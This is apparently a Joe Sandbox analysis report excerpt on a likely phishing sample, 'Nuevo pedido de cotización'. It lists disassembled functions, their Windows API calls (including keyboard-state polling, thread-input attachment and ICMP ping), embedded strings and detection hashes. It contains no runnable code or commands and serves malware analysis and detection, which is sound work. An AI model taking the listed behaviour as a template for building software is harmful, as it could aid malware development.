Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: f57b734fede1fc753982c3518747a7f993b023549a43e0310dd471c06c065a33
Instruction ID: d5f0273135176d32096a9a496bec8d8c8b7586013444a675379c2746c7b64d10
Opcode Fuzzy Hash: f57b734fede1fc753982c3518747a7f993b023549a43e0310dd471c06c065a33
Instruction Fuzzy Hash: 24C157756283019FD700EF68C88492BBBE9FF89B48F10491DF98A9B291D730ED55CB52

Function 00277A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00277AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00277B8F
SHGetDesktopFolder.SHELL32(?), ref: 00277BA3
CoCreateInstance.OLE32(0029FD08,00000000,00000001,002C6E6C,?), ref: 00277BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00277C74
CoTaskMemFree.OLE32(?,?), ref: 00277CCC
SHBrowseForFolderW.SHELL32(?), ref: 00277D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00277D7A
CoTaskMemFree.OLE32(00000000), ref: 00277D81
CoTaskMemFree.OLE32(00000000), ref: 00277DD6
CoUninitialize.OLE32 ref: 00277DDC

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: e388b27668bce39c4d4a5dac1b622714624ed094649e20b40f6cce3df1afcb8d
Instruction ID: 080be1f639ffb31f5c6032c17892269504678ceb009b89a86631df1acced2cfc
Opcode Fuzzy Hash: e388b27668bce39c4d4a5dac1b622714624ed094649e20b40f6cce3df1afcb8d
Instruction Fuzzy Hash: 61C10C75A14209AFDB14DF64C888DAEBBF9FF48304B148499E81ADB262D730ED55CF90

Function 0029541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00295504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00295515
CharNextW.USER32(00000158), ref: 00295544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00295585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0029559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002955AC

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 2c2fce9ecc6b721b5253da8f2af76fc6f6c0680f65e67768d0318a43666ceba9
Instruction ID: 34badd4e33f1bed74df64064c2e7693c58d9753000f3ac0c294e7a42c374b35b
Opcode Fuzzy Hash: 2c2fce9ecc6b721b5253da8f2af76fc6f6c0680f65e67768d0318a43666ceba9
Instruction Fuzzy Hash: B761B031A20629EFEF168F50DC849FE7BB9FF09720F104145F925A7291D7749AA0DBA0

Function 0025FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0025FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0025FB08
VariantInit.OLEAUT32(?), ref: 0025FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0025FB3A
VariantCopy.OLEAUT32(?,?), ref: 0025FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0025FBA1
VariantClear.OLEAUT32(?), ref: 0025FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0025FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0025FBCC
VariantClear.OLEAUT32(?), ref: 0025FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0025FBE9

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 96b76c3b789e824f6a56a03e0648c92c3519277013da70f96b684e8a48ad6b37
Instruction ID: 591663224a8dd33ee05a5ad5cb6fa0b86cad633ed5fb51993bd6b2f28257cba5
Opcode Fuzzy Hash: 96b76c3b789e824f6a56a03e0648c92c3519277013da70f96b684e8a48ad6b37
Instruction Fuzzy Hash: 96418075A10219DFCF00DF68D9589AEBBB9FF08345F10806AF906A7261DB30A955CFA1

Function 00269C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00269CA1
GetAsyncKeyState.USER32(000000A0), ref: 00269D22
GetKeyState.USER32(000000A0), ref: 00269D3D
GetAsyncKeyState.USER32(000000A1), ref: 00269D57
GetKeyState.USER32(000000A1), ref: 00269D6C
GetAsyncKeyState.USER32(00000011), ref: 00269D84
GetKeyState.USER32(00000011), ref: 00269D96
GetAsyncKeyState.USER32(00000012), ref: 00269DAE
GetKeyState.USER32(00000012), ref: 00269DC0
GetAsyncKeyState.USER32(0000005B), ref: 00269DD8
GetKeyState.USER32(0000005B), ref: 00269DEA

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: fbad9eb74a2b38df89bf52a375e0474b1ec6d6e8fb5ca1c127318e63ea2621b6
Instruction ID: 4b9ffc5fd51dccf08d250f1ca2f60d0e8d7c646688f840e6e462f5ccb343dfc4
Opcode Fuzzy Hash: fbad9eb74a2b38df89bf52a375e0474b1ec6d6e8fb5ca1c127318e63ea2621b6
Instruction Fuzzy Hash: 1F41F6305147CB69FF309F64C8043B5BEA8AF16304F44806BCAC6561C2DFB599E8C7A2

Function 0028055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002805BC
inet_addr.WSOCK32(?), ref: 0028061C
gethostbyname.WSOCK32(?), ref: 00280628
IcmpCreateFile.IPHLPAPI ref: 00280636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002806C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002806E5
IcmpCloseHandle.IPHLPAPI(?), ref: 002807B9
WSACleanup.WSOCK32 ref: 002807BF

Strings

Ping, xrefs: 00280676

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 25070694c72ce65423a659efa92917e2dfbb5ffc1d508ad3e8777b682402ce6b
Instruction ID: 0cb65a619fcfad3dd13b20b96ecf357bf0bfcd384fb2178931c43c7333a3068c
Opcode Fuzzy Hash: 25070694c72ce65423a659efa92917e2dfbb5ffc1d508ad3e8777b682402ce6b
Instruction Fuzzy Hash: 2191AF786192029FD360EF15D4C8F1ABBE4AF44318F1485A9F46A8B6E2C770EC59CF91

Function 00288CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00288CF3

Part of subcall function 00268E54: _wcslen.LIBCMT ref: 00268E77

_wcslen.LIBCMT ref: 00288D4E
_wcslen.LIBCMT ref: 00288D9C
_wcslen.LIBCMT ref: 00288DDC
_wcslen.LIBCMT ref: 00288E6E

Strings

winapi, xrefs: 00288D96, 00288D9B
none, xrefs: 00288E65, 00288E6A
cdecl, xrefs: 00288D48, 00288D4D
stdcall, xrefs: 00288DD6, 00288DDB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 4c80c6062a96d96ca84536f92c72d0b1dce1c98189418e3bab5b6f2a50bcd9d8
Instruction ID: 1c255510acafcf807fd3b4a9b396523a39171364ef969ee0df0205b828cfe311
Opcode Fuzzy Hash: 4c80c6062a96d96ca84536f92c72d0b1dce1c98189418e3bab5b6f2a50bcd9d8
Instruction Fuzzy Hash: E751B435A211179BCF14EF6CC9409BEB7A5BF64720BA04229F426E72C5DB71ED60CB90

Function 0028372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00283774
CoUninitialize.OLE32 ref: 0028377F
CoCreateInstance.OLE32(?,00000000,00000017,0029FB78,?), ref: 002837D9
IIDFromString.OLE32(?,?), ref: 0028384C
VariantInit.OLEAUT32(?), ref: 002838E4
VariantClear.OLEAUT32(?), ref: 00283936

Strings

NULL Pointer assignment, xrefs: 0028381E
Invalid parameter, xrefs: 00283865
Failed to create object, xrefs: 002837E4, 0028389A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 17a2d655a968f1cba2098203f7eee8cebcd300541063f48cf56005b842880a05
Instruction ID: 1998f77e57c6406b7c6ea0f5e12e4255c95056f447ba3d40a9a587ab1cc0b917
Opcode Fuzzy Hash: 17a2d655a968f1cba2098203f7eee8cebcd300541063f48cf56005b842880a05
Instruction Fuzzy Hash: 9F61A074629301AFD311EF54C888F5ABBE8EF49B14F100919F8859B2D1C770EE68CB92

Function 00298B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00219BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00219BB2

Part of subcall function 0021912D: GetCursorPos.USER32(?), ref: 00219141
Part of subcall function 0021912D: ScreenToClient.USER32(00000000,?), ref: 0021915E
Part of subcall function 0021912D: GetAsyncKeyState.USER32(00000001), ref: 00219183
Part of subcall function 0021912D: GetAsyncKeyState.USER32(00000002), ref: 0021919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00298B6B
ImageList_EndDrag.COMCTL32 ref: 00298B71
ReleaseCapture.USER32 ref: 00298B77
SetWindowTextW.USER32(?,00000000), ref: 00298C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00298C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00298CFF

Strings

@GUI_DROPID, xrefs: 00298C51
p#-, xrefs: 00298C71
@GUI_DRAGFILE, xrefs: 00298C9A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#-
API String ID: 1924731296-962097240
Opcode ID: 57738892c221d48c3d35dea3f472e733352b3d6075b6cdf9a30cfe7d0e6b7dd3
Instruction ID: a28e087b9761bede69b98adb85a6e2daa05c016e3c5ad5dd88c6f6fef515f0f7
Opcode Fuzzy Hash: 57738892c221d48c3d35dea3f472e733352b3d6075b6cdf9a30cfe7d0e6b7dd3
Instruction Fuzzy Hash: EA519971515300AFDB04DF14D86AFAA77E4BB89710F50062EF952A72E2CB709D64CB62

Function 00273388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002733CF

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002733F0

Strings

Line %d (File "%s"):, xrefs: 00273443, 0027345C
Error: , xrefs: 002734D1
^ ERROR , xrefs: 0027349E
"%s" (%d) : ==> %s:%s%s, xrefs: 00273504
"%s" (%d) : ==> %s:, xrefs: 00273522
Incorrect parameters to object property !, xrefs: 002734AB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: aeea7ff34257e18f8f399d8ffcb4d8dfbc513092a776fe2332ef506b9e296d8d
Instruction ID: 29c4df02931a2f3175015840b74966944b2e0b4997aded10e88f0f9d24ef7d73
Opcode Fuzzy Hash: aeea7ff34257e18f8f399d8ffcb4d8dfbc513092a776fe2332ef506b9e296d8d
Instruction Fuzzy Hash: D5516F71D20209AADF15EBA0DD46EEEB778AF18340F504165F50572192EB316FB8DF60

Function 0026B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0026B5FC
_wcslen.LIBCMT ref: 0026B608
_wcslen.LIBCMT ref: 0026B64D
_wcslen.LIBCMT ref: 0026B68C
_wcslen.LIBCMT ref: 0026B6C7

Strings

KEYS, xrefs: 0026B647, 0026B64C
APPEND, xrefs: 0026B6C1, 0026B6C6
REMOVE, xrefs: 0026B602, 0026B607
EXISTS, xrefs: 0026B686, 0026B68B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: d91c77a2ed3ebe5caba8d1c942a3d98e8c28d19e46a79e2b28f96236d04bc51f
Instruction ID: 8b059530a2d3700057dc1254374c991316acb6ce59d4045d5bbf8f4ce471f437
Opcode Fuzzy Hash: d91c77a2ed3ebe5caba8d1c942a3d98e8c28d19e46a79e2b28f96236d04bc51f
Instruction Fuzzy Hash: B641E633A201279BCB216F7DC9905BEB7A9EFA0754B244229E421DB284F731CDE1C790

Function 00275393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002753A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00275416
GetLastError.KERNEL32 ref: 00275420
SetErrorMode.KERNEL32(00000000,READY), ref: 002754A7

Strings

UNKNOWN, xrefs: 00275444
READONLY, xrefs: 00275452
NOTREADY, xrefs: 0027544B
READY, xrefs: 00275460, 00275468
INVALID, xrefs: 00275459

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 4a5f2857751da8cf281517561f7d5be47c15edb217f32f135657e6c7bfc23dbf
Instruction ID: e204eb1b7999a388c2b9dd8a4f4ddc1d572a317da6d087d6abcae100374ee1c5
Opcode Fuzzy Hash: 4a5f2857751da8cf281517561f7d5be47c15edb217f32f135657e6c7bfc23dbf
Instruction Fuzzy Hash: 9331B335A206159FD710DF68C498FAABBB4EF45305F14C05AE40ACB292DBB1DD92CBA0

Function 00293A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00293A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00293AA0
GetWindowLongW.USER32(?,000000F0), ref: 00293AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00293AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00293B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00293BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00293BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00293BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00293BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00293C13

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 7333431280abf6895c433e0981a8ba487344cf1fb37428861175dc73a4344b27
Instruction ID: c2e5ae1743374004f1660a10d84d2f66b043707e5389e9d8fbf3febceb7ed651
Opcode Fuzzy Hash: 7333431280abf6895c433e0981a8ba487344cf1fb37428861175dc73a4344b27
Instruction Fuzzy Hash: 91618A75910208AFDB10DFA8CC95EEE77B8EB09704F10409AFA15E72A2C770AE65DF50

Function 0026B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0026B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0026A1E1,?,00000001), ref: 0026B165
GetWindowThreadProcessId.USER32(00000000), ref: 0026B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0026A1E1,?,00000001), ref: 0026B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0026B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0026A1E1,?,00000001), ref: 0026B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0026A1E1,?,00000001), ref: 0026B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0026A1E1,?,00000001), ref: 0026B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0026A1E1,?,00000001), ref: 0026B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0026A1E1,?,00000001), ref: 0026B21D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 886d65431e57ac8dc6773691d981c61d2a77543b1d3af5773c745bd1d4f821c6
Instruction ID: bab7ea95d77f94cfee73cab6694aaa9adbebcfe7a60ebcb069c6aa881c56e401
Opcode Fuzzy Hash: 886d65431e57ac8dc6773691d981c61d2a77543b1d3af5773c745bd1d4f821c6
Instruction Fuzzy Hash: 8031AD75920205BFDB12DF64EC5CBAE7BADBB51312F208026FA05D6190D7B49ED08F61

Function 00232C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00232C94

Part of subcall function 002329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000), ref: 002329DE
Part of subcall function 002329C8: GetLastError.KERNEL32(00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000,00000000), ref: 002329F0

_free.LIBCMT ref: 00232CA0
_free.LIBCMT ref: 00232CAB
_free.LIBCMT ref: 00232CB6
_free.LIBCMT ref: 00232CC1
_free.LIBCMT ref: 00232CCC
_free.LIBCMT ref: 00232CD7
_free.LIBCMT ref: 00232CE2
_free.LIBCMT ref: 00232CED
_free.LIBCMT ref: 00232CFB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 83f20df46797b22bfbbaa3fbf88c719c14abcf265be41951385316016fe204a3
